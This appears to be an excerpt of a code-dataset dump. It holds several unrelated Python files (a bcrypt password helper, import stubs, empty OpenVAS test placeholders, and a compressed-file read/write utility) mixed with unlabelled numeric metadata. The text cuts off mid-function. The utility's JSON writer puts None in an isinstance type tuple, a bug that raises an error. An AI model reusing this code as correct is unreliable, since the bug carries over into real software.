| 0.323529
| 0.411765
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0
| 0
| 0
| 0.104167
| 0.058824
| 102
| 2
| 51
| 51
| 0.604167
| 0
| 0
| 0
| 0
| 0
| 0.627451
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3324f7fe561236b85e20064d171292578e8e31cb
| 291
|
py
|
Python
|
models/passwords.py
|
xiomara-masmela/feedback_web_app
|
d6c035159b4b3c7ea33ce8973fb18792853e1df1
|
[
"MIT"
] | null | null | null |
models/passwords.py
|
xiomara-masmela/feedback_web_app
|
d6c035159b4b3c7ea33ce8973fb18792853e1df1
|
[
"MIT"
] | null | null | null |
models/passwords.py
|
xiomara-masmela/feedback_web_app
|
d6c035159b4b3c7ea33ce8973fb18792853e1df1
|
[
"MIT"
] | null | null | null |
import bcrypt
def convert_secure_password(password):
password_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()
return password_hash
def check_password(password, password_hash):
valid = bcrypt.checkpw(password.encode(), password_hash.encode())
return valid
| 32.333333
| 79
| 0.766323
| 35
| 291
| 6.171429
| 0.428571
| 0.296296
| 0.222222
| 0.259259
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 291
| 9
| 80
| 32.333333
| 0.847059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0.714286
| 0.142857
| 0
| 0.714286
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
686958155b3cade7c1e41952cc7ac7755582b929
| 144
|
py
|
Python
|
src/color_detection/__init__.py
|
songdet/rubik_cube_solver
|
186efde7a6b3b3e7520abc91c9c46c4d78606e88
|
[
"MIT"
] | null | null | null |
src/color_detection/__init__.py
|
songdet/rubik_cube_solver
|
186efde7a6b3b3e7520abc91c9c46c4d78606e88
|
[
"MIT"
] | null | null | null |
src/color_detection/__init__.py
|
songdet/rubik_cube_solver
|
186efde7a6b3b3e7520abc91c9c46c4d78606e88
|
[
"MIT"
] | null | null | null |
from color_detection.detect import detect
from color_detection.detect import ColorDetector
from color_detection.calibrate import get_color_bound
| 48
| 53
| 0.902778
| 20
| 144
| 6.25
| 0.45
| 0.216
| 0.432
| 0.384
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076389
| 144
| 3
| 53
| 48
| 0.93985
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d7f6fd72cf75693b0e429580feefa645d9e58921
| 16,043
|
py
|
Python
|
tests/test_openvas_lib_data.py
|
abhishekvasishtb/openvas_lib
|
8525e05860e012e30ff633652cb5d20050baa032
|
[
"BSD-3-Clause"
] | 77
|
2015-04-22T10:43:15.000Z
|
2021-02-21T04:14:46.000Z
|
tests/test_openvas_lib_data.py
|
zeinlol/openvas_lib
|
326bde506ccb2b98fe52f30bfc623e30f4525194
|
[
"BSD-3-Clause"
] | 39
|
2015-03-18T04:33:15.000Z
|
2022-03-17T06:52:00.000Z
|
tests/test_openvas_lib_data.py
|
zeinlol/openvas_lib
|
326bde506ccb2b98fe52f30bfc623e30f4525194
|
[
"BSD-3-Clause"
] | 100
|
2015-01-18T16:42:55.000Z
|
2021-12-01T23:57:14.000Z
|
import unittest
class TestOpenVASPort(unittest.TestCase):
pass
# def test___init__(self):
# # open_vas_port = OpenVASPort(port_name, number, proto)
# assert False # TODO: implement your test here
#
# def test_number(self):
# # open_vas_port = OpenVASPort(port_name, number, proto)
# # self.assertEqual(expected, open_vas_port.number())
# assert False # TODO: implement your test here
#
# def test_port_name(self):
# # open_vas_port = OpenVASPort(port_name, number, proto)
# # self.assertEqual(expected, open_vas_port.port_name())
# assert False # TODO: implement your test here
#
# def test_proto(self):
# # open_vas_port = OpenVASPort(port_name, number, proto)
# # self.assertEqual(expected, open_vas_port.proto())
# assert False # TODO: implement your test here
class TestOpenVASNVT(unittest.TestCase):
pass
# def test___init__(self):
# # open_vasnv_t = OpenVASNVT()
# assert False # TODO: implement your test here
#
# def test_bid(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.bid())
# assert False # TODO: implement your test here
#
# def test_bid_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.bid(val))
# assert False # TODO: implement your test here
#
# def test_bugtraq(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.bugtraq())
# assert False # TODO: implement your test here
#
# def test_bugtraq_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.bugtraq(val))
# assert False # TODO: implement your test here
#
# def test_category(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.category())
# assert False # TODO: implement your test here
#
# def test_category_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.category(val))
# assert False # TODO: implement your test here
#
# def test_cve(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.cve())
# assert False # TODO: implement your test here
#
# def test_cve_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.cve(val))
# assert False # TODO: implement your test here
#
# def test_cvss_base(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.cvss_base())
# assert False # TODO: implement your test here
#
# def test_cvss_base_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.cvss_base(val))
# assert False # TODO: implement your test here
#
# def test_description(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.raw_description())
# assert False # TODO: implement your test here
#
# def test_description_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.raw_description(val))
# assert False # TODO: implement your test here
#
# def test_family(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.family())
# assert False # TODO: implement your test here
#
# def test_family_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.family(val))
# assert False # TODO: implement your test here
#
# def test_fingerprints(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.fingerprints())
# assert False # TODO: implement your test here
#
# def test_fingerprints_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.fingerprints(val))
# assert False # TODO: implement your test here
#
# def test_make_object(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.make_object(oid, name, cvss_base, risk_factor, summary, raw_description, family, category, cve, bid, bugtraq, xrefs, fingerprints, tags))
# assert False # TODO: implement your test here
#
# def test_name(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.name())
# assert False # TODO: implement your test here
#
# def test_name_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.name(val))
# assert False # TODO: implement your test here
#
# def test_oid(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.oid())
# assert False # TODO: implement your test here
#
# def test_oid_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.oid(val))
# assert False # TODO: implement your test here
#
# def test_risk_factor(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.risk_factor())
# assert False # TODO: implement your test here
#
# def test_risk_factor_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.risk_factor(val))
# assert False # TODO: implement your test here
#
# def test_summary(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.summary())
# assert False # TODO: implement your test here
#
# def test_summary_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.summary(val))
# assert False # TODO: implement your test here
#
# def test_tags(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.tags())
# assert False # TODO: implement your test here
#
# def test_tags_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.tags(val))
# assert False # TODO: implement your test here
#
# def test_xrefs(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.xrefs())
# assert False # TODO: implement your test here
#
# def test_xrefs_case_2(self):
# # open_vasnv_t = OpenVASNVT()
# # self.assertEqual(expected, open_vasnv_t.xrefs(val))
# assert False # TODO: implement your test here
class TestOpenVASOverride(unittest.TestCase):
pass
# def test___init__(self):
# # open_vas_override = OpenVASOverride()
# assert False # TODO: implement your test here
#
# def test_make_object(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.make_object(oid, name, text, text_is_excerpt, threat, new_threat, orphan))
# assert False # TODO: implement your test here
#
# def test_name(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.name())
# assert False # TODO: implement your test here
#
# def test_name_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.name(val))
# assert False # TODO: implement your test here
#
# def test_new_threat(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.new_threat())
# assert False # TODO: implement your test here
#
# def test_new_threat_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.new_threat(val))
# assert False # TODO: implement your test here
#
# def test_oid(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.oid())
# assert False # TODO: implement your test here
#
# def test_oid_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.oid(val))
# assert False # TODO: implement your test here
#
# def test_orphan(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.orphan())
# assert False # TODO: implement your test here
#
# def test_orphan_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.orphan(val))
# assert False # TODO: implement your test here
#
# def test_text(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.text())
# assert False # TODO: implement your test here
#
# def test_text_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.text(val))
# assert False # TODO: implement your test here
#
# def test_text_is_excerpt(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.text_is_excerpt())
# assert False # TODO: implement your test here
#
# def test_text_is_excerpt_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.text_is_excerpt(val))
# assert False # TODO: implement your test here
#
# def test_threat(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.threat())
# assert False # TODO: implement your test here
#
# def test_threat_case_2(self):
# # open_vas_override = OpenVASOverride()
# # self.assertEqual(expected, open_vas_override.threat(val))
# assert False # TODO: implement your test here
class TestOpenVASNotes(unittest.TestCase):
pass
# def test___init__(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# assert False # TODO: implement your test here
#
# def test_name(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# # self.assertEqual(expected, open_vas_notes.name())
# assert False # TODO: implement your test here
#
# def test_oid(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# # self.assertEqual(expected, open_vas_notes.oid())
# assert False # TODO: implement your test here
#
# def test_orphan(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# # self.assertEqual(expected, open_vas_notes.orphan())
# assert False # TODO: implement your test here
#
# def test_text(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# # self.assertEqual(expected, open_vas_notes.text())
# assert False # TODO: implement your test here
#
# def test_text_is_excerpt(self):
# # open_vas_notes = OpenVASNotes(oid, name, text, text_is_excerpt, orphan)
# # self.assertEqual(expected, open_vas_notes.text_is_excerpt())
# assert False # TODO: implement your test here
class TestOpenVASResult(unittest.TestCase):
pass
# def test___init__(self):
# # open_vas_result = OpenVASResult()
# assert False # TODO: implement your test here
#
# def test_description(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.raw_description())
# assert False # TODO: implement your test here
#
# def test_description_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.raw_description(val))
# assert False # TODO: implement your test here
#
# def test_host(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.host())
# assert False # TODO: implement your test here
#
# def test_host_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.host(val))
# assert False # TODO: implement your test here
#
# def test_id(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.id())
# assert False # TODO: implement your test here
#
# def test_id_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.id(val))
# assert False # TODO: implement your test here
#
# def test_make_object(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.make_object(result_id, subnet, host, port, nvt, threat, raw_description, notes, overrides))
# assert False # TODO: implement your test here
#
# def test_notes(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.notes())
# assert False # TODO: implement your test here
#
# def test_notes_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.notes(val))
# assert False # TODO: implement your test here
#
# def test_nvt(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.nvt())
# assert False # TODO: implement your test here
#
# def test_nvt_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.nvt(val))
# assert False # TODO: implement your test here
#
# def test_overrides(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.overrides())
# assert False # TODO: implement your test here
#
# def test_overrides_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.overrides(val))
# assert False # TODO: implement your test here
#
# def test_port(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.port())
# assert False # TODO: implement your test here
#
# def test_port_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.port(val))
# assert False # TODO: implement your test here
#
# def test_subnet(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.subnet())
# assert False # TODO: implement your test here
#
# def test_subnet_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.subnet(val))
# assert False # TODO: implement your test here
#
# def test_threat(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.threat())
# assert False # TODO: implement your test here
#
# def test_threat_case_2(self):
# # open_vas_result = OpenVASResult()
# # self.assertEqual(expected, open_vas_result.threat(val))
# assert False # TODO: implement your test here
if __name__ == '__main__':
unittest.main()
| 40.718274
| 189
| 0.640778
| 1,891
| 16,043
| 5.162348
| 0.038075
| 0.063102
| 0.116779
| 0.186847
| 0.965991
| 0.960049
| 0.957591
| 0.957591
| 0.948371
| 0.911391
| 0
| 0.002502
| 0.252696
| 16,043
| 393
| 190
| 40.821883
| 0.811744
| 0.853269
| 0
| 0.384615
| 0
| 0
| 0.004545
| 0
| 0
| 0
| 0
| 0.002545
| 0
| 1
| 0
| true
| 0.384615
| 0.076923
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
0bd66e130e72aa780640266f5e92b40a7ebc9895
| 121
|
py
|
Python
|
platform/core/polyaxon/administration/register/artifacts_stores.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/register/artifacts_stores.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
platform/core/polyaxon/administration/register/artifacts_stores.py
|
hackerwins/polyaxon
|
ff56a098283ca872abfbaae6ba8abba479ffa394
|
[
"Apache-2.0"
] | null | null | null |
from db.models.artifacts_stores import ArtifactsStore
def register(admin_register):
admin_register(ArtifactsStore)
| 20.166667
| 53
| 0.834711
| 14
| 121
| 7
| 0.714286
| 0.265306
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107438
| 121
| 5
| 54
| 24.2
| 0.907407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0441d31e81610fd06a88d92c4fecfafccc282029
| 232
|
py
|
Python
|
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
|
vkuznet/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 8
|
2015-08-14T04:01:32.000Z
|
2021-06-03T00:56:42.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 162
|
2015-01-07T21:34:47.000Z
|
2021-10-13T09:42:41.000Z
|
Server/Python/src/dbs/dao/MySQL/DatasetParent/ListChild.py
|
yuyiguo/DBS
|
14df8bbe8ee8f874fe423399b18afef911fe78c7
|
[
"Apache-2.0"
] | 16
|
2015-01-22T15:27:29.000Z
|
2021-04-28T09:23:28.000Z
|
#!/usr/bin/env python
"""
This module provides DatasetParent.ListChild data access object.
"""
from dbs.dao.Oracle.DatasetParent.ListChild import ListChild as OraDatasetChildList
class ListChild(OraDatasetChildList):
pass
| 23.2
| 83
| 0.784483
| 26
| 232
| 7
| 0.807692
| 0.241758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12931
| 232
| 9
| 84
| 25.777778
| 0.90099
| 0.366379
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f08963d9d48a9ec743b4386dd0a1ecbe043e4101
| 69
|
py
|
Python
|
sunpy/net/jsoc/__init__.py
|
RhnSharma/sunpy
|
03700193d287156ca1922eb27c4c2ad50040e53f
|
[
"BSD-2-Clause"
] | 628
|
2015-01-14T17:34:10.000Z
|
2022-03-29T06:07:50.000Z
|
sunpy/net/jsoc/__init__.py
|
RhnSharma/sunpy
|
03700193d287156ca1922eb27c4c2ad50040e53f
|
[
"BSD-2-Clause"
] | 3,983
|
2015-01-03T11:16:21.000Z
|
2022-03-31T16:55:38.000Z
|
sunpy/net/jsoc/__init__.py
|
RhnSharma/sunpy
|
03700193d287156ca1922eb27c4c2ad50040e53f
|
[
"BSD-2-Clause"
] | 582
|
2015-01-14T10:09:24.000Z
|
2022-03-29T06:07:12.000Z
|
from sunpy.net.jsoc.attrs import *
from sunpy.net.jsoc.jsoc import *
| 23
| 34
| 0.768116
| 12
| 69
| 4.416667
| 0.5
| 0.339623
| 0.45283
| 0.603774
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115942
| 69
| 2
| 35
| 34.5
| 0.868852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f08b63d03566f117666137e2053218f971e8aa81
| 10,004
|
py
|
Python
|
src/jk_utils/file_rw.py
|
jkpubsrc/python-module-jk-utils
|
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
|
[
"Apache-1.1"
] | null | null | null |
src/jk_utils/file_rw.py
|
jkpubsrc/python-module-jk-utils
|
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
|
[
"Apache-1.1"
] | null | null | null |
src/jk_utils/file_rw.py
|
jkpubsrc/python-module-jk-utils
|
6bf97b3dcde7a970c20ca43323e2eb0dda8fbfb3
|
[
"Apache-1.1"
] | null | null | null |
import os
import gzip
import bz2
import lzma
import json
class openReadBinary(object):
def __init__(self, filePath):
self.__filePath = filePath
if filePath.endswith(".gz") or filePath.endswith(".gzip"):
self.__open = gzip.open
elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"):
self.__open = bz2.open
elif filePath.endswith(".lzma") or filePath.endswith(".xz"):
self.__open = lzma.open
else:
self.__open = open
#
def __enter__(self):
self.__f = self.__open(self.__filePath, "rb")
return self.__f
#
def __exit__(self, *args):
self.__f.close()
#
#
class openReadText(object):
class _BinaryWrapper(object):
def __init__(self, f):
self.__f = f
#
def read(self, length = None):
data = self.__f.read()
return data.decode("utf-8")
#
def close(self):
self.__f.close()
#
#
def __init__(self, filePath):
self.__filePath = filePath
if filePath.endswith(".gz") or filePath.endswith(".gzip"):
self.__open = gzip.open
self.__bToText = True
elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"):
self.__open = bz2.open
self.__bToText = True
elif filePath.endswith(".lzma") or filePath.endswith(".xz"):
self.__open = lzma.open
self.__bToText = True
else:
self.__open = open
self.__bToText = False
#
def __enter__(self):
if self.__bToText:
self.__f = openReadText._BinaryWrapper(self.__open(self.__filePath, "rb"))
else:
self.__f = self.__open(self.__filePath, "r")
return self.__f
#
def __exit__(self, *args):
self.__f.close()
#
#
class openReadJSON(object):
class _BinaryWrapper(object):
def __init__(self, f):
self.__f = f
#
def read(self, length = None):
data = self.__f.read()
return data.decode("utf-8")
#
def close(self):
self.__f.close()
#
#
class _JSONWrapper(object):
def __init__(self, f):
self.__f = f
#
def read(self):
data = self.__f.read()
return json.loads(data)
#
def close(self):
self.__f.close()
#
#
def __init__(self, filePath):
self.__filePath = filePath
if filePath.endswith(".gz") or filePath.endswith(".gzip"):
self.__open = gzip.open
self.__bToText = True
elif filePath.endswith(".bz2") or filePath.endswith(".bzip2"):
self.__open = bz2.open
self.__bToText = True
elif filePath.endswith(".lzma") or filePath.endswith(".xz"):
self.__open = lzma.open
self.__bToText = True
else:
self.__open = open
self.__bToText = False
#
def __enter__(self):
if self.__bToText:
self.__f = openReadJSON._JSONWrapper(openReadJSON._BinaryWrapper(self.__open(self.__filePath, "rb")))
else:
self.__f = openReadJSON._JSONWrapper(self.__open(self.__filePath, "r"))
return self.__f
#
def __exit__(self, *args):
self.__f.close()
#
#
class openWriteBinary(object):
def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None):
self.__filePath = filePath
self.__bSafeWrite = bSafeWrite
if self.__bSafeWrite:
self.__filePathTmp = filePath + ".tmp"
self.__format = None
if compression:
if (compression == "gzip") or (compression == "gz"):
self.__open = gzip.open
elif (compression == "bz2") or (compression == "bzip2"):
self.__open = bz2.open
elif compression == "lzma":
self.__format = lzma.FORMAT_ALONE
self.__open = lzma.open
elif compression == "xz":
self.__format = lzma.FORMAT_XZ
self.__open = lzma.open
else:
raise Exception("Unknown compressor: " + compression)
else:
self.__open = open
#
def __enter__(self):
if self.__bSafeWrite:
if self.__format:
self.__f = self.__open(self.__filePathTmp, "wb", format=self.__format)
else:
self.__f = self.__open(self.__filePathTmp, "wb")
else:
if self.__format:
self.__f = self.__open(self.__filePath, "wb", format=self.__format)
else:
self.__f = self.__open(self.__filePath, "wb")
return self.__f
#
def __exit__(self, *args):
self.__f.close()
if self.__bSafeWrite:
if os.path.isfile(self.__filePath):
os.unlink(self.__filePath)
os.rename(self.__filePathTmp, self.__filePath)
#
#
class openWriteText(object):
#
# Write text data to an underlying binary stream
#
class _BinaryWrapper(object):
def __init__(self, f):
self.__f = f
#
def write(self, textData):
self.__f.write(textData.encode("utf-8"))
#
def close(self):
self.__f.close()
#
#
def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None):
self.__filePath = filePath
self.__bSafeWrite = bSafeWrite
if self.__bSafeWrite:
self.__filePathTmp = filePath + ".tmp"
self.__bToBinary = False
self.__format = None
if compression:
if (compression == "gzip") or (compression == "gz"):
self.__open = gzip.open
self.__bToBinary = True
elif (compression == "bz2") or (compression == "bzip2"):
self.__open = bz2.open
self.__bToBinary = True
elif compression == "lzma":
self.__format = lzma.FORMAT_ALONE
self.__open = lzma.open
self.__bToBinary = True
elif compression == "xz":
self.__format = lzma.FORMAT_XZ
self.__open = lzma.open
self.__bToBinary = True
else:
raise Exception("Unknown compressor: " + compression)
else:
self.__open = open
#
def __enter__(self):
if self.__bSafeWrite:
if self.__bToBinary:
if self.__format:
self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePathTmp, "wb", format=self.__format))
else:
self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePathTmp, "wb"))
else:
if self.__format:
self.__f = self.__open(self.__filePathTmp, "w", format=self.__format)
else:
self.__f = self.__open(self.__filePathTmp, "w")
else:
if self.__bToBinary:
if self.__format:
self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePath, "wb", format=self.__format))
else:
self.__f = openWriteText._BinaryWrapper(self.__open(self.__filePath, "wb"))
else:
if self.__format:
self.__f = self.__open(self.__filePath, "w", format=self.__format)
else:
self.__f = self.__open(self.__filePath, "w")
return self.__f
#
def __exit__(self, *args):
self.__f.close()
if self.__bSafeWrite:
if os.path.isfile(self.__filePath):
os.unlink(self.__filePath)
os.rename(self.__filePathTmp, self.__filePath)
#
#
class openWriteJSON(object):
#
# Write JSON data to an underlying text stream
#
class _JSONWrapper(object):
def __init__(self, f, bPretty:bool):
self.__f = f
self.__bPretty = bPretty
#
def write(self, objData):
assert isinstance(objData, (bool, int, float, str, tuple, list, dict, None))
if self.__bPretty:
self.__f.write(json.dumps(objData, indent="\t", sort_keys=True))
else:
self.__f.write(json.dumps(objData))
#
def close(self):
self.__f.close()
#
#
class _BinaryWrapper(object):
def __init__(self, f):
self.__f = f
#
def write(self, textData):
self.__f.write(textData.encode("utf-8"))
#
def close(self):
self.__f.close()
#
#
def __init__(self, filePath, bSafeWrite:bool = True, compression:str = None, bPretty:bool = False):
self.__filePath = filePath
self.__bSafeWrite = bSafeWrite
if self.__bSafeWrite:
self.__filePathTmp = filePath + ".tmp"
self.__bToBinary = False
self.__bPretty = bPretty
self.__format = None
if compression:
if (compression == "gzip") or (compression == "gz"):
self.__open = gzip.open
self.__bToBinary = True
elif (compression == "bz2") or (compression == "bzip2"):
self.__open = bz2.open
self.__bToBinary = True
elif compression == "lzma":
self.__format = lzma.FORMAT_ALONE
self.__open = lzma.open
self.__bToBinary = True
elif compression == "xz":
self.__format = lzma.FORMAT_XZ
self.__open = lzma.open
self.__bToBinary = True
else:
raise Exception("Unknown compressor: " + compression)
else:
self.__open = open
#
def __enter__(self):
if self.__bSafeWrite:
if self.__bToBinary:
if self.__format:
self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePathTmp, "wb", format=self.__format))
else:
self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePathTmp, "wb"))
else:
if self.__format:
self.__f = self.__open(self.__filePathTmp, "w", format=self.__format)
else:
self.__f = self.__open(self.__filePathTmp, "w")
else:
if self.__bToBinary:
if self.__format:
self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePath, "wb", format=self.__format))
else:
